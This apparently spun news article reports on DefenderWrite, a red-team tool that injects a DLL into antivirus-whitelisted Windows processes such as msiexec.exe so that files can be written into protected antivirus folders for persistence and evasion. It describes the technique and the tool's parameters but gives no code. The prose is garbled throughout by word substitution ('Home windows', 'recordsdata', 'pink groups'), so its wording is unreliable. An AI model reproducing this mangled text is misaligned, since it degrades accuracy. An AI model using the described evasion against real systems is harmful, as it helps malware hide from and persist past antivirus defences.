A brand new device known as DefenderWrite exploits whitelisted Home windows applications to bypass protections and write arbitrary recordsdata into antivirus executable folders, probably enabling malware persistence and evasion.
Developed by cybersecurity knowledgeable Two Seven One Three, the device demonstrates a novel method for penetration testers and pink groups to drop payloads in extremely protected places while not having kernel-level entry.
This improvement highlights ongoing challenges in antivirus self-protection mechanisms, the place folders housing AV executables are sometimes shielded from modifications to forestall tampering.
By figuring out system applications that antivirus distributors whitelist for updates and installations, attackers can leverage these exceptions to inject malicious DLLs, turning the AV’s personal safeguards towards it.
The device’s launch, shared by way of GitHub, has sparked discussions on the stability between operational requirements for AV software program and safety dangers in enterprise environments.
Exploiting Whitelisted Applications for Arbitrary Writes
The core innovation behind DefenderWrite lies in systematically scanning Home windows executables to search out these permitted to entry AV folders.
By enumerating all .exe recordsdata in directories like C:Home windows, then use course of creation and distant DLL injection to check write capabilities into protected paths.
A customized DLL performs the file write operation and studies success or failure, permitting the device to pinpoint exploitable processes like msiexec.exe with out triggering defenses.
In testing on Home windows 11 24H2 with Microsoft Defender model 4.18.25070.5-0, the strategy recognized 4 such applications: msiexec.exe, Register-CimProvider.exe, svchost.exe, and lsass.exe.
As an illustration, launching msiexec.exe and injecting the DLL permits writing a file immediately into Defender’s set up listing, as demonstrated in lab experiments.
This strategy extends past Microsoft Defender; comparable whitelisting vulnerabilities had been confirmed in BitDefender, TrendMicro Antivirus Plus, and Avast, although particular particulars stay undisclosed to encourage impartial verification.
DefenderWrite helps key parameters for focused operations, together with TargetExePath for the host executable, FullDLLPath for the injectable library, and FileToWrite for the vacation spot path inside the AV folder. An non-compulsory “c” flag simplifies copying the DLL to the desired location remotely.
Accompanying the binary is a PowerShell script, Run_Check.ps1, which automates scanning C:Home windows executables and logging whitelisted ones for additional exploitation.
Customers can customise the script for his or her atmosphere, making it appropriate for pink crew simulations or defensive assessments.
The GitHub repository supplies full supply code and documentation, emphasizing moral use in licensed testing solely. Two Seven One Three, lively on X as @TwoSevenOneT, shares extra pentest insights and encourages group experiments to strengthen AV resilience.
As soon as a malicious payload resides in an AV folder, it advantages from the identical exceptions that defend professional recordsdata, evading scans and probably reaching long-term persistence.
This method underscores the necessity for distributors to audit whitelisting insurance policies and implement stricter course of isolation throughout updates. Whereas not a zero-day vulnerability, DefenderWrite reveals systemic gaps that would support real-world assaults if unaddressed.
Organizations ought to monitor AV replace mechanisms and think about layered defenses past conventional file permissions. With the device’s open availability, count on broader adoption in safety analysis circles to push for improved protections throughout well-liked antivirus options.
Observe us on Google Information, LinkedIn, and X for every day cybersecurity updates. Contact us to characteristic your tales.
